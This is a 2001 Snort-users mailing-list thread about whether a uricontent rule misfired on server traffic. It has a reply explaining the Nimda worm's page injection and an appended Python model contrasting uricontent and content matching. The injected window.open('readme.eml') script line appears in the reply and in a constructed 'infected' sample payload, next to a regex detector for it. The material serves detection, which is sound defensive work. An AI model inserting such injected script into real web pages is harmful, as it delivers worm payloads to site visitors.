[Snort-users] uricontent misbehaving?

Tim Kramer kramert at ...3975...
Fri Nov 2 11:27:02 EST 2001


The "readme.eml" rule (in this case) was probably written
in response to the Nimda worm which infects web servers so
that they have an extra line of HTML/JavaScript code at the
bottom of the web page.  The additional code causes a new
browser window to be opened well off the visible portion of
the desktop (location 6000,6000) and to download a file
called "readme.eml".  The actual code that gets added to the
webpage looks like (without the proper JavaScript tags):

window.open("readme.eml", null, "resizable=no,top=6000,left=6000")

The act of visiting the infected website causes an additional
HTTP request.  This also makes it easy to detect (via Snort)
and/or easy to block (via Squid).

Hope this helps,
Tim Kramer

On Fri, 2001-11-02 at 13:21, dan.ellis at ...3983... wrote:
> Hi,
> I'm not actually a snort user, but I'm trying to respond to a log I was
> sent:
> Date:01/11 18:43:59 Name:WEB-MISC readme.eml attempt
> Priority:8 Type:Attempted User Privilege Gain
> IP info: xxx.xxx.xxx.xxx:80 -> yyy.yyy.yyy.yyy:62689
> References: 1
> which apparently came from the rule:
> alert tcp $EXTERNAL_NET 80 -> $HOME_NET any \
>     (msg:"WEB-MISC readme.eml attempt"; \
>     flags:A+; uricontent:"readme.eml"; nocase; \
>     classtype:attempted-user; sid:1284; rev:3; \
>     reference:url,www.cert.org/advisories/CA-2001-26.html;)
> (xxx... is our web server.)
> I'm not very familiar with snort, but from what I've just read in the
> documentation the 'uricontent' bit is supposed to match only on
> the URI of requests. However, this was a response packet from our
> web server. Of course, several of our pages contain the text "readme.eml",
> but I don't see how this rule could have triggered unless it was
> mistakenly matching as 'content' instead of 'uricontent'. Has 'uricontent'
> been known to misbehave in this way?
> Any information greatly appreciated.
> Regards,
> Dan.
> --
> Dan Ellis, Software Engineer                              Sophos Anti-Virus
> email: dan.ellis at ...3983...                           http://www.sophos.com
> US Support: +1 888 SOPHOS 9                     UK Support: +44 1235 559933
> _______________________________________________
> Snort-users mailing list
> Snort-users at lists.sourceforge.net
> Go to this URL to change user options or unsubscribe:
> https://lists.sourceforge.net/lists/listinfo/snort-users
> Snort-users list archive:
> http://www.geocrawler.com/redir-sf.php3?list=snort-users

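An added example, not code from the thread, from Snort or from Sophos: a small Python model of the distinction Dan is asking about. As documented, `uricontent` searches only the request URI, so it cannot match a server response at all; a plain `content` match over the whole payload fires on any page that merely mentions the file name; and a response-side detector for the injected `window.open()` that Tim describes catches an infected page without flagging every page that contains the string. The HTTP payloads, port numbers and rule names below are constructed for the example; the code models the documented rule semantics, not the internals of the 2001 Snort build that produced Dan's alert.

```python
"""Model of Snort uricontent vs. content matching over constructed HTTP traffic."""
import re

METHODS = {b"GET", b"HEAD", b"POST", b"PUT", b"DELETE", b"OPTIONS", b"TRACE"}

# Constructed sample payloads for this example; not packets from the thread.
CLIENT_REQUEST = b"GET /README.EML HTTP/1.0\r\nHost: www.example.test\r\n\r\n"
SERVER_RESPONSE_PLAIN = (
    b"HTTP/1.0 200 OK\r\nContent-Type: text/html\r\n\r\n"
    b"<html><body>Our FAQ mentions readme.eml as a Nimda indicator.</body></html>"
)
SERVER_RESPONSE_INFECTED = (
    b"HTTP/1.0 200 OK\r\nContent-Type: text/html\r\n\r\n"
    b"<html><body>Welcome</body></html>\n"
    b'<html><script language="JavaScript">'
    b'window.open("readme.eml", null, "resizable=no,top=6000,left=6000")'
    b"</script></html>"
)


def request_uri(payload):
    """Return the request-target from an HTTP request line, or None if the
    payload is not a request. This is the only buffer a uricontent match is
    documented to search: never headers, body, or a server response."""
    line, _sep, _rest = payload.partition(b"\r\n")
    parts = line.split(b" ")
    if len(parts) != 3 or parts[0] not in METHODS or not parts[2].startswith(b"HTTP/"):
        return None
    return parts[1]


def uricontent_match(payload, pattern, nocase=True):
    """uricontent semantics: match against the request URI only."""
    uri = request_uri(payload)
    if uri is None:
        return False
    return pattern.lower() in uri.lower() if nocase else pattern in uri


def content_match(payload, pattern, nocase=True):
    """content semantics: match anywhere in the payload, headers and body included."""
    return pattern.lower() in payload.lower() if nocase else pattern in payload


# The injected JavaScript quoted in the thread: window.open() on readme.eml
# positioned at 6000,6000. Tolerates whitespace and either quote style.
NIMDA_INJECT_RE = re.compile(
    rb"window\.open\(\s*[\"']readme\.eml[\"']\s*,[^)]*top=6000,left=6000",
    re.IGNORECASE,
)


def nimda_injection(payload):
    """Response-side check: is the Nimda window.open() present in the body?"""
    head, sep, body = payload.partition(b"\r\n\r\n")
    if not sep or not head.startswith(b"HTTP/"):
        return False
    return NIMDA_INJECT_RE.search(body) is not None


# Hypothetical rule set: (message, direction, matcher). The first rule is how
# the thread's uricontent rule is documented to behave; the second shows what a
# plain content match on server traffic would do; the third is a response-side
# rule that looks for the injection itself rather than the bare string.
RULES = [
    ("WEB-MISC readme.eml request (uricontent)", "to_server",
     lambda p: uricontent_match(p, b"readme.eml")),
    ("readme.eml string in response (content)", "from_server",
     lambda p: content_match(p, b"readme.eml")),
    ("Nimda readme.eml window.open injection", "from_server", nimda_injection),
]


def evaluate(src_port, dst_port, payload):
    """Return the messages of every rule whose direction and matcher apply."""
    if dst_port == 80:
        direction = "to_server"
    elif src_port == 80:
        direction = "from_server"
    else:
        direction = None
    return [msg for msg, d, matcher in RULES if d == direction and matcher(payload)]


if __name__ == "__main__":
    for label, src, dst, payload in [
        ("client request", 62689, 80, CLIENT_REQUEST),
        ("plain response", 80, 62689, SERVER_RESPONSE_PLAIN),
        ("infected response", 80, 62689, SERVER_RESPONSE_INFECTED),
    ]:
        print(f"{label}: {evaluate(src, dst, payload)}")
```

Run stand-alone, the script shows that only the client's GET for readme.eml satisfies the uricontent rule, that a content match on the server side fires on the harmless FAQ page as well as the infected one, and that only the infected page trips the injection check.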